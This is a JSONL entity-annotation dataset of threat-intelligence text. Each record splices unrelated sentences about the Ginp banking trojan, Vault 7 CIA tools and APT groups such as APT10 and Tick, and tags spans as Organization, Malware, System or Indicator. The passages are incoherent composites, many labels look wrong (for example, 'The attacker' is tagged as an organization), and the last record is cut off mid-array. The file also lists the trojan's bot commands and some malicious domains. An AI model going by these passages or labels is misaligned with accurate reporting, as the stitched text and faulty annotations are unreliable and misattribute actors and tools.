{"text": "Allows an application to read or write the system settings . The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS . FIN8 is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail , restaurant , and hospitality industries .", "spans": [{"start": 80, "end": 97, "label": "Organization"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 164, "end": 168, "label": "Organization"}]}
{"text": "Allows an application to force the device to lock Allows applications to access information about Wi-Fi networks . CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop . Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017 .", "spans": [{"start": 115, "end": 120, "label": "Organization"}, {"start": 208, "end": 212, "label": "System"}, {"start": 215, "end": 218, "label": "System"}, {"start": 243, "end": 265, "label": "System"}, {"start": 285, "end": 294, "label": "Organization"}]}
{"text": "Allows applications to change Wi-Fi connectivity state . These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . The group has mainly targeted victims in the defense , military , and government sectors .", "spans": [{"start": 85, "end": 88, "label": "Organization"}]}
{"text": "Allows applications to change network connectivity state . The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016 .", "spans": [{"start": 63, "end": 66, "label": "Organization"}, {"start": 168, "end": 178, "label": "Organization"}]}
{"text": "Analysis of the malware shows that it uses the common string obfuscation of character replacement ( Figure 7 ) : Figure 7 : Encoded Marcher Strings Figure 8 : Decoded Marcher Strings As noted , the application requests extensive permissions during installation ; Figure 9 shows the request to act as device administrator , a particular permission that should very rarely be granted to an app . CIA's malware includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk areas Brutal Kangaroo and to keep its malware infestations going . The group heavily leverages open-source tools and custom payloads for carrying out attacks .", "spans": [{"start": 132, "end": 139, "label": "Malware"}, {"start": 167, "end": 174, "label": "Malware"}, {"start": 394, "end": 399, "label": "Organization"}, {"start": 498, "end": 510, "label": "System"}, {"start": 659, "end": 674, "label": "System"}]}
{"text": "Figure 9 : Prompt for application permissions upon installation Figures 10 and 11 show the other permission screens for the app : Figure 10 Figure 10 : Part 1 of the permission screen for the app Figure 11 : Part 2 of the permission screen for the app Once installed the app will place a legitimate looking icon on the phone \u2019 s home screen , again using branding stolen from the bank . Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa . Deep Panda : Shell Crew , WebMasters , KungFu Kittens , PinkPanther , Black Vine .", "spans": [{"start": 446, "end": 451, "label": "Organization"}, {"start": 591, "end": 599, "label": "System"}, {"start": 604, "end": 610, "label": "System"}, {"start": 613, "end": 623, "label": "Organization"}, {"start": 626, "end": 636, "label": "Organization"}, {"start": 639, "end": 649, "label": "Organization"}, {"start": 652, "end": 666, "label": "Organization"}, {"start": 669, "end": 680, "label": "Organization"}, {"start": 683, "end": 693, "label": "Organization"}]}
{"text": "Figure 12 : Fake Bank Austria Security application icon In addition to operating as a banking Trojan , overlaying a legitimate banking app with an indistinguishable credential theft page , the malware also asks for credit card information from the user when they open applications such as the Google Play store . The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below . Deep Panda is a suspected Chinese threat group known to target many industries , including government , defense , financial , and telecommunications .", "spans": [{"start": 12, "end": 50, "label": "System"}, {"start": 293, "end": 304, "label": "System"}, {"start": 317, "end": 320, "label": "Organization"}, {"start": 404, "end": 411, "label": "System"}, {"start": 414, "end": 422, "label": "System"}, {"start": 425, "end": 432, "label": "System"}, {"start": 435, "end": 440, "label": "System"}, {"start": 466, "end": 470, "label": "System"}, {"start": 487, "end": 496, "label": "System"}, {"start": 501, "end": 508, "label": "System"}, {"start": 569, "end": 579, "label": "Organization"}]}
{"text": "Figure 13 : Popup asking for a credit card number The application also supports stealing credit card verification information ( Figures 14 and 15 ) . By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable . The intrusion into healthcare company Anthem has been attributed to Deep Panda .", "spans": [{"start": 205, "end": 210, "label": "Organization"}, {"start": 215, "end": 221, "label": "Organization"}, {"start": 226, "end": 229, "label": "Organization"}, {"start": 355, "end": 361, "label": "Organization"}, {"start": 382, "end": 395, "label": "Organization"}]}
{"text": "Figure 14 : Information theft via fake credit card verification using stolen branding Figure 15 : Information theft via fake credit card verification using stolen branding Some of the campaigns appear to have a wider reach based on bit.ly statistics like this one from October 13 , 2017 : Figure 16 : bit.ly statistics for an October 13 , 2017 campaign Over several days during the last three months , Proofpoint researchers observed campaigns using similar techniques targeting the banking customers of Raffeisen and Sparkasse . Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border area \u2014 including France , Italy and Switzerland . This group is also known as Shell Crew , WebMasters , KungFu Kittens , and PinkPanther .", "spans": [{"start": 232, "end": 238, "label": "Indicator"}, {"start": 301, "end": 307, "label": "Indicator"}, {"start": 402, "end": 412, "label": "Organization"}, {"start": 548, "end": 551, "label": "Organization"}, {"start": 749, "end": 759, "label": "Organization"}, {"start": 762, "end": 772, "label": "Organization"}, {"start": 775, "end": 789, "label": "Organization"}, {"start": 796, "end": 807, "label": "Organization"}]}
{"text": "A review of the bit.ly statistics for these campaigns shows that they were at least as effective in driving end-user clicks as the Bank Austria campaign analyzed above . A number of the CIA's electronic attack methods are designed for physical proximity . Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion .", "spans": [{"start": 16, "end": 22, "label": "Indicator"}, {"start": 131, "end": 143, "label": "System"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 256, "end": 266, "label": "Organization"}, {"start": 295, "end": 305, "label": "Organization"}, {"start": 358, "end": 364, "label": "Organization"}]}
{"text": "Conclusion As our computing increasingly crosses multiple screens , we should expect to see threats extending across mobile and desktop environments . The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer . Some analysts track Deep Panda and APT19 as the same group , but it is unclear from open source information if the groups are the same .", "spans": [{"start": 155, "end": 163, "label": "Organization"}, {"start": 183, "end": 205, "label": "System"}, {"start": 308, "end": 324, "label": "Organization"}, {"start": 329, "end": 334, "label": "Organization"}]}
{"text": "Moreover , as we use mobile devices to access the web and phishing templates extend to mobile environments , we should expect to see a greater variety of integrated threats like the scheme we detail here . The attacker then infects and exfiltrates data to removable media . Dragonfly : Energetic Bear .", "spans": [{"start": 210, "end": 218, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 274, "end": 283, "label": "Organization"}, {"start": 286, "end": 300, "label": "Organization"}]}
{"text": "As on the desktop , mobile users need to be wary of installing applications from outside of legitimate app stores and sources and be on the lookout for bogus banking sites that ask for more information than users would normally provide on legitimate sites . As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . Dragonfly is a cyber espionage group that has been active since at least 2011 .", "spans": [{"start": 283, "end": 286, "label": "Organization"}, {"start": 287, "end": 294, "label": "System"}, {"start": 455, "end": 464, "label": "Organization"}]}
{"text": "Unusual domains , the use of URL shorteners , and solicitations that do not come from verifiable sources are also red flags for potential phishing and malware . For example , the CIA attack system Fine Dining , provides 24 decoy applications for CIA spies to use . They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013 .", "spans": []}
{"text": "Ginp - A malware patchwork borrowing from Anubis November 2019 Intro ThreatFabric analysts have recently investigated an interesting new strain of banking malware . For example , Comodo was defeated by CIA malware placing itself in the Window's Recycle Bin . They have also targeted companies related to industrial control systems .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 42, "end": 48, "label": "Malware"}, {"start": 69, "end": 81, "label": "System"}, {"start": 179, "end": 185, "label": "Organization"}, {"start": 202, "end": 205, "label": "Organization"}]}
{"text": "The malware was first spotted by Tatyana Shishkova from Kaspersky by end October 2019 , but actually dates back to June 2019 . CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure . A similar group emerged in 2015 and was identified by Symantec as Dragonfly 2.0 .", "spans": [{"start": 56, "end": 65, "label": "Organization"}, {"start": 127, "end": 130, "label": "Organization"}, {"start": 164, "end": 178, "label": "Organization"}, {"start": 315, "end": 323, "label": "Organization"}, {"start": 327, "end": 340, "label": "Organization"}]}
{"text": "It is still under active development , with at least 5 different versions of the Trojan released within the last 5 months ( June - November 2019 ) . The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation . There is debate over the extent of the overlap between Dragonfly and Dragonfly 2.0 , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": [{"start": 153, "end": 158, "label": "Organization"}, {"start": 183, "end": 190, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}, {"start": 414, "end": 427, "label": "Organization"}]}
{"text": "What makes Ginp stand out is that it was built from scratch being expanded through regular updates , the last of which including code copied from the infamous Anubis banking Trojan , indicating that its author is cherry-picking the most relevant functionality for its malware . This information is used by the CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation . Dragonfly 2.0 : Berserk Bear .", "spans": [{"start": 11, "end": 15, "label": "Malware"}, {"start": 159, "end": 165, "label": "Malware"}, {"start": 310, "end": 315, "label": "Organization"}, {"start": 316, "end": 330, "label": "System"}, {"start": 433, "end": 446, "label": "Organization"}, {"start": 449, "end": 461, "label": "Organization"}]}
{"text": "In addition , its original target list is extremely narrow and seems to be focused on Spanish banks . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . Dragonfly 2.0 is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least March 2016 .", "spans": [{"start": 135, "end": 144, "label": "Malware"}, {"start": 215, "end": 227, "label": "Malware"}, {"start": 264, "end": 277, "label": "Organization"}, {"start": 325, "end": 344, "label": "Organization"}, {"start": 363, "end": 394, "label": "Organization"}]}
{"text": "Last but not least , all the overlay screens ( injects ) for the banks include two steps ; first stealing the victim \u2019 s login credentials , then their credit card details . HIVE is a multi-platform CIA malware suite and its associated control software . There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": [{"start": 174, "end": 178, "label": "System"}, {"start": 199, "end": 202, "label": "Organization"}, {"start": 306, "end": 319, "label": "Organization"}, {"start": 324, "end": 333, "label": "Organization"}]}
{"text": "Although multi-step overlays are not something new , their usage is generally limited to avoid raising suspicion . A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks . DragonOK is a threat group that has targeted Japanese organizations with phishing emails .", "spans": [{"start": 145, "end": 148, "label": "Organization"}, {"start": 251, "end": 256, "label": "Organization"}, {"start": 259, "end": 268, "label": "Organization"}, {"start": 271, "end": 277, "label": "Organization"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 290, "end": 295, "label": "Organization"}, {"start": 298, "end": 308, "label": "Organization"}, {"start": 311, "end": 318, "label": "Organization"}, {"start": 323, "end": 343, "label": "Organization"}, {"start": 383, "end": 391, "label": "Organization"}, {"start": 437, "end": 450, "label": "Organization"}]}
{"text": "Evolution The initial version of the malware dates back to early June 2019 , masquerading as a \u201c Google Play Verificator \u201d app . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . Due to overlapping TTPs , including similar custom tools , DragonOK is thought to have a direct or indirect relationship with the threat group Moafee .", "spans": [{"start": 97, "end": 120, "label": "System"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 291, "end": 299, "label": "Organization"}, {"start": 369, "end": 381, "label": "Organization"}]}
{"text": "At that time , Ginp was a simple SMS stealer whose purpose was only to send a copy of incoming and outgoing SMS messages to the C2 server . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . It is known to use a variety of malware , including Sysget / HelloBridge , PlugX , PoisonIvy , FormerFirstRat , NFlog , and NewCT .", "spans": [{"start": 15, "end": 19, "label": "Malware"}, {"start": 210, "end": 214, "label": "Organization"}, {"start": 281, "end": 287, "label": "Malware"}, {"start": 290, "end": 301, "label": "Malware"}, {"start": 304, "end": 309, "label": "Malware"}, {"start": 312, "end": 321, "label": "Malware"}, {"start": 324, "end": 338, "label": "Malware"}, {"start": 341, "end": 346, "label": "Malware"}, {"start": 353, "end": 358, "label": "Malware"}]}
{"text": "A couple of months later , in August 2019 , a new version was released with additional banking-specific features . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn\u2019t be surprising they are the work of the group described in Kaspersky\u2019s Winnti \u2013 More than just a game\u201d . Dust Storm is a threat group that has targeted multiple industries in Japan , South Korea , the United States , Europe , and several Southeast Asian countries .", "spans": [{"start": 182, "end": 197, "label": "Organization"}, {"start": 271, "end": 282, "label": "Organization"}, {"start": 283, "end": 289, "label": "Organization"}, {"start": 317, "end": 327, "label": "Organization"}]}
{"text": "This and following versions were masquerading as fake \u201c Adobe Flash Player \u201d apps . The OSB functions as the interface between CIA operational staff and the relevant technical support staff . CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013 .", "spans": [{"start": 56, "end": 74, "label": "System"}, {"start": 88, "end": 91, "label": "System"}, {"start": 127, "end": 130, "label": "Organization"}, {"start": 192, "end": 203, "label": "Organization"}]}
{"text": "The malware was able to perform overlay attacks and become the default SMS app through the abuse of the Accessibility Service . A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 . It has targeted countries including Israel , Saudi Arabia , Turkey , the U.S. , Jordan , and Germany .", "spans": [{"start": 248, "end": 263, "label": "Organization"}, {"start": 268, "end": 274, "label": "Organization"}]}
{"text": "The overlay consisted of a generic credit card grabber targeting social and utility apps , such as Google Play , Facebook , WhatsApp , Chrome , Skype , Instagram and Twitter . The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . Tick Group Continues Attacks .", "spans": [{"start": 99, "end": 110, "label": "System"}, {"start": 113, "end": 121, "label": "System"}, {"start": 124, "end": 132, "label": "System"}, {"start": 135, "end": 141, "label": "System"}, {"start": 144, "end": 149, "label": "System"}, {"start": 152, "end": 161, "label": "System"}, {"start": 166, "end": 173, "label": "System"}, {"start": 180, "end": 189, "label": "Malware"}, {"start": 349, "end": 353, "label": "Malware"}, {"start": 409, "end": 413, "label": "Organization"}]}
{"text": "Although early versions had some basic code and string obfuscation , protection of the third version of the malware was enhanced with the use of payload obfuscation . The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware . The \" Tick \" group has conducted cyber espionage attacks against organizations in the Republic of Korea and Japan for several years .", "spans": [{"start": 334, "end": 339, "label": "Organization"}, {"start": 367, "end": 371, "label": "Organization"}]}
{"text": "The capabilities remained unchanged , but a new endpoint was added to the Trojan C2 allowing it to handle the generic card grabber overlay and specific target overlays ( banking apps ) separately . On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 . The group focuses on companies that have intellectual property or sensitive information like those in the Defense and High-Tech industries .", "spans": [{"start": 280, "end": 288, "label": "System"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 453, "end": 474, "label": "Organization"}]}
{"text": "In addition , the credit card grabber target list was expanded with Snapchat and Viber . APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated to a Dropbox account using the cURL for Windows command-line tool . The group is known to use custom malware called Daserf , but also employs multiple commodity and custom tools , exploit vulnerabilities , and use social engineering techniques .", "spans": [{"start": 68, "end": 76, "label": "System"}, {"start": 81, "end": 86, "label": "System"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 152, "end": 158, "label": "System"}, {"start": 234, "end": 238, "label": "System"}, {"start": 319, "end": 325, "label": "Malware"}, {"start": 345, "end": 363, "label": "System"}, {"start": 368, "end": 380, "label": "System"}, {"start": 391, "end": 406, "label": "Vulnerability"}, {"start": 417, "end": 446, "label": "System"}]}
{"text": "In the third version spotted in the wild , the author introduced parts of the source code of the infamous Anubis Trojan ( which was leaked earlier in 2019 ) . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . With multiple tools and anonymous infrastructure , they are running longstanding and persistent attack campaigns .", "spans": [{"start": 106, "end": 112, "label": "Malware"}, {"start": 159, "end": 166, "label": "Malware"}, {"start": 178, "end": 194, "label": "Malware"}, {"start": 197, "end": 216, "label": "Malware"}, {"start": 219, "end": 233, "label": "Malware"}, {"start": 236, "end": 252, "label": "Malware"}, {"start": 255, "end": 266, "label": "Malware"}, {"start": 269, "end": 289, "label": "Malware"}, {"start": 292, "end": 299, "label": "Malware"}, {"start": 333, "end": 339, "label": "Malware"}, {"start": 358, "end": 372, "label": "System"}, {"start": 377, "end": 401, "label": "System"}]}
{"text": "This change came hand in hand with a new overlay target list , no longer targeting social apps , but focusing on banking instead . we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . We have observed that the adversary has repeatedly attacked a high-profile target in Japan using multiple malware families for the last three years .", "spans": [{"start": 201, "end": 206, "label": "Organization"}, {"start": 221, "end": 232, "label": "Organization"}, {"start": 235, "end": 243, "label": "Organization"}, {"start": 246, "end": 250, "label": "Organization"}, {"start": 469, "end": 485, "label": "Malware"}]}
{"text": "A remarkable fact is that all the targeted apps relate to Spanish banks , including targets never seen before in any other Android banking Trojan . On top of the breadth , volume , and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) . Symantec was first to publicly report on Tick , followed by LAC in 2016 .", "spans": [{"start": 123, "end": 130, "label": "System"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 375, "end": 383, "label": "Organization"}, {"start": 416, "end": 420, "label": "Organization"}, {"start": 435, "end": 438, "label": "Organization"}]}
{"text": "The 24 target apps belong to 7 different Spanish banks : Caixa bank , Bankinter , Bankia , BBVA , EVO Banco , Kutxabank and Santander . Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , \u201d against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . These reports discussed the group \u2019s malware , Daserf ( a.k.a Muirim or Nioupale ) and some additional downloader programs .", "spans": [{"start": 57, "end": 67, "label": "System"}, {"start": 70, "end": 79, "label": "System"}, {"start": 82, "end": 88, "label": "System"}, {"start": 91, "end": 95, "label": "System"}, {"start": 98, "end": 107, "label": "System"}, {"start": 110, "end": 119, "label": "System"}, {"start": 124, "end": 133, "label": "System"}, {"start": 252, "end": 255, "label": "Organization"}, {"start": 516, "end": 522, "label": "Malware"}, {"start": 531, "end": 537, "label": "Malware"}, {"start": 541, "end": 549, "label": "Malware"}]}
{"text": "The specific apps can be found in the target list in the appendix . We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks , and not of stealing Visma intellectual property . Though Daserf wasn\u2019t a popular attack tool at the time of publishing the two reports , it dates back to at least 2011 .", "spans": [{"start": 83, "end": 88, "label": "Organization"}, {"start": 255, "end": 261, "label": "Malware"}]}
{"text": "The most recent version of Ginp ( at the time of writing ) was detected at the end of November 2019 . In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . Using AutoFocus , we were able to identify the link among Daserf and two other threats , 9002 and Invader .", "spans": [{"start": 27, "end": 31, "label": "Malware"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 150, "end": 163, "label": "Organization"}, {"start": 185, "end": 200, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 317, "end": 323, "label": "Malware"}, {"start": 348, "end": 352, "label": "Malware"}, {"start": 357, "end": 364, "label": "Malware"}]}
{"text": "This version has some small modifications which seems to be unused , as the malware behaviour is the same as the previous version . The backdoor was deployed using the Notepad++ updater and sideloading malicious DLL , as noted in APT10\u2019s targeting of Japanese corporations in July 2018 . These threats shared infrastructure between July 2012 and April 2013 .", "spans": [{"start": 230, "end": 237, "label": "Organization"}, {"start": 251, "end": 272, "label": "Organization"}]}
{"text": "The author has introduced the capability to grant the app the device admin permission . That attack was attributed to perpetrators Kaspersky called the Winnti Group . Invader ( a.k.a Kickesgo ) is a backdoor that injects its main code into a legitimate process , such as explorer.exe , and has following functions :", "spans": [{"start": 131, "end": 140, "label": "Organization"}, {"start": 152, "end": 164, "label": "Organization"}, {"start": 167, "end": 174, "label": "Malware"}, {"start": 183, "end": 191, "label": "Malware"}, {"start": 271, "end": 283, "label": "Indicator"}]}
{"text": "Additionally new endpoint was added that seems related to downloading a module for the malware , probably with new features or configuration . APT10 is a threat actor that has been active since at least 2009 . Logs keystrokes and mouse movement Captures screenshots Opens cmd.exe shell Enumerates processes Executes programs Removes itself Enumerates all opening TCP and UDP ports .", "spans": [{"start": 143, "end": 148, "label": "Organization"}, {"start": 272, "end": 279, "label": "Indicator"}, {"start": 363, "end": 366, "label": "Indicator"}]}
{"text": "How it works When the malware is first started on the device it will begin by removing its icon from the app drawer , hiding from the end user . APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft . 9002 is the infamous RAT frequently seen in targeted attacks reported by various security vendors , including Palo Alto Networks .", "spans": [{"start": 145, "end": 150, "label": "Organization"}, {"start": 177, "end": 187, "label": "Organization"}, {"start": 190, "end": 197, "label": "Organization"}, {"start": 200, "end": 209, "label": "Organization"}, {"start": 212, "end": 222, "label": "Organization"}, {"start": 225, "end": 239, "label": "Organization"}, {"start": 244, "end": 250, "label": "Organization"}, {"start": 257, "end": 261, "label": "Organization"}, {"start": 266, "end": 277, "label": "Organization"}, {"start": 297, "end": 304, "label": "Organization"}, {"start": 350, "end": 354, "label": "Malware"}, {"start": 460, "end": 478, "label": "Organization"}]}
{"text": "In the second step it asks the victim for the Accessibility Service privilege as visible in following screenshot : Ginp Accessibility request Once the user grants the requested Accessibility Service privilege , Ginp starts by granting itself additional permissions , such as ( dynamic ) permissions required in order to be able to send messages and make calls , without requiring any further action from the victim . We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date . Interestingly , the C2 servers linking 9002 to Daserf were described in the report of an Adobe Flash Zero-day attack from FireEye in 2013 .", "spans": [{"start": 115, "end": 119, "label": "Malware"}, {"start": 211, "end": 215, "label": "Malware"}, {"start": 428, "end": 433, "label": "Organization"}, {"start": 554, "end": 556, "label": "System"}, {"start": 573, "end": 577, "label": "Malware"}, {"start": 581, "end": 587, "label": "Malware"}, {"start": 623, "end": 634, "label": "System"}, {"start": 635, "end": 643, "label": "Vulnerability"}, {"start": 656, "end": 663, "label": "Organization"}]}
{"text": "When done , the bot is functional and ready to receive commands and perform overlay attacks . In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co Ltd and Laoying Baichen Instruments Equipment Co Ltd . These domains were registered through the privacy protection services in 2008 and 2011 .", "spans": [{"start": 135, "end": 140, "label": "Organization"}, {"start": 168, "end": 191, "label": "Organization"}, {"start": 204, "end": 226, "label": "Organization"}]}
{"text": "The commands supported by the most recent version of the bot are listed below . Based on the technical data uncovered , and in light of recent disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors . krjregh.sacreeflame.com lywja.healthsvsolu.com .", "spans": [{"start": 218, "end": 241, "label": "Organization"}, {"start": 258, "end": 281, "label": "Indicator"}, {"start": 282, "end": 304, "label": "Indicator"}]}
{"text": "As can be observed , the possibilities offered by the bot are pretty common . Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 . Though we don\u2019t know the targets of these malware samples at the time of writing this article , we suspect the same group is behind these threats for a number of reasons .", "spans": [{"start": 116, "end": 131, "label": "Organization"}, {"start": 199, "end": 206, "label": "Organization"}, {"start": 253, "end": 257, "label": "Organization"}]}
{"text": "Command Description SEND_SMS Send an SMS from the bot to a specific number NEW_URL Update the C2 URL KILL Disable the bot PING_DELAY Update interval between each ping request CLEAN_IGNORE_PKG Empty list of overlayed apps WRITE_INJECTS Update target list READ_INJECTS Get current target list START_ADMIN Request Device Admin privileges ALL_SMS Get all SMS messages DISABLE_ACCESSIBILITY Stop preventing user from disabling the accessibility service ENABLE_ACCESSIBILITY Prevent user from disabling Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . The samples of Daserf that shared infrastructure were submitted to VirusTotal only from Japan multiple times in 2013 .", "spans": [{"start": 570, "end": 573, "label": "Organization"}, {"start": 704, "end": 710, "label": "Malware"}, {"start": 756, "end": 766, "label": "Organization"}]}
{"text": "the accessibility service ENABLE_HIDDEN_SMS Set malware as default SMS app DISABLE_HIDDEN_SMS Remove malware as default SMS app ENABLE_EXTENDED_INJECT Enable overlay attacks DISABLE_EXTENDED_INJECT Disable overlay attacks ENABLE_CC_GRABBER Enable the Google Play overlay DISABLE_CC_GRABBER Disable the Google Play overlay START_DEBUG Enable debugging GET_LOGCAT Get logs from the device STOP_DEBUG Disable debugging GET_APPS The December APT10 indictment noted that the group\u2019s malicious activities breached at least 45 companies and managed service providers in 12 countries , including Brazil , Canada , Finland , France , Germany , India , Japan , Sweden , Switzerland , the United Arab Emirates , the United Kingdom , and the United States . As noted in a later section , another Invader sample shared different C2 servers with Daserf .", "spans": [{"start": 251, "end": 262, "label": "System"}, {"start": 302, "end": 313, "label": "System"}, {"start": 438, "end": 443, "label": "Organization"}, {"start": 784, "end": 791, "label": "Malware"}, {"start": 816, "end": 818, "label": "System"}, {"start": 832, "end": 838, "label": "Malware"}]}
{"text": "Get installed applications GET_CONTACTS Get contacts SEND_BULK_SMS Send SMS to multiple numbers UPDATE_APK Not implemented INJECT_PACKAGE Add new overlay target CALL_FORWARD Enable/disable call forwarding START_PERMISSIONS Starts request for additional permissions ( Accessibility privileges , battery optimizations bypass , dynamic permissions ) Features The most recent version of Ginp has the same capabilities as most other Android banking Trojans , such as the use of overlay attacks , SMS control and contact In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . Symantec reported that Tick exploited additional Adobe Flash and Microsoft Office vulnerabilities .", "spans": [{"start": 428, "end": 435, "label": "System"}, {"start": 540, "end": 545, "label": "Organization"}, {"start": 595, "end": 601, "label": "System"}, {"start": 606, "end": 613, "label": "System"}, {"start": 675, "end": 683, "label": "Organization"}, {"start": 698, "end": 702, "label": "Organization"}, {"start": 724, "end": 735, "label": "System"}, {"start": 740, "end": 756, "label": "System"}, {"start": 757, "end": 772, "label": "Vulnerability"}]}
{"text": "list harvesting . In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . SecureWorks said the adversary group is abusing a previously undisclosed vulnerability in Japanese Software Asset Management system on endpoints .", "spans": [{"start": 47, "end": 56, "label": "Organization"}, {"start": 186, "end": 197, "label": "Organization"}, {"start": 236, "end": 272, "label": "Vulnerability"}]}
{"text": "Overall , it has a fairly common feature list , but it is expected to expand in future updates . In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company . Therefore , Tick or their digital quartermaster is capable of deploying new and unique exploits .", "spans": [{"start": 122, "end": 127, "label": "Organization"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 299, "end": 314, "label": "Organization"}, {"start": 329, "end": 333, "label": "Organization"}]}
{"text": "Since Ginp is already using some code from the Anubis Trojan , it is quite likely that other , more advanced features from Anubis or other malware , such as a back-connect proxy , screen-streaming and RAT will also be added in the future . In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers\u2019 networks . In July 2016 , we identified a compromised website in Japan that was hosting a Daserf variant .", "spans": [{"start": 47, "end": 53, "label": "Malware"}, {"start": 123, "end": 129, "label": "System"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 310, "end": 320, "label": "Organization"}, {"start": 331, "end": 337, "label": "Organization"}, {"start": 496, "end": 510, "label": "Malware"}]}
{"text": "Ginp embeds the following set of features , allowing it to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( local overlays obtained from the C2 ) SMS harvesting : SMS listing SMS harvesting : SMS forwarding Contact list collection Application listing Overlaying : Targets list update SMS : Sending Calls : Call forwarding C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Update 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . The web server was also a C2 server for another threat , Minzen ( a.k.a , XXMM , Wali , or ShadowWali ) .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 508, "end": 519, "label": "Malware"}, {"start": 537, "end": 550, "label": "Malware"}, {"start": 553, "end": 568, "label": "Malware"}, {"start": 571, "end": 584, "label": "Malware"}, {"start": 589, "end": 605, "label": "Malware"}, {"start": 779, "end": 781, "label": "System"}, {"start": 810, "end": 816, "label": "Malware"}, {"start": 827, "end": 831, "label": "Malware"}, 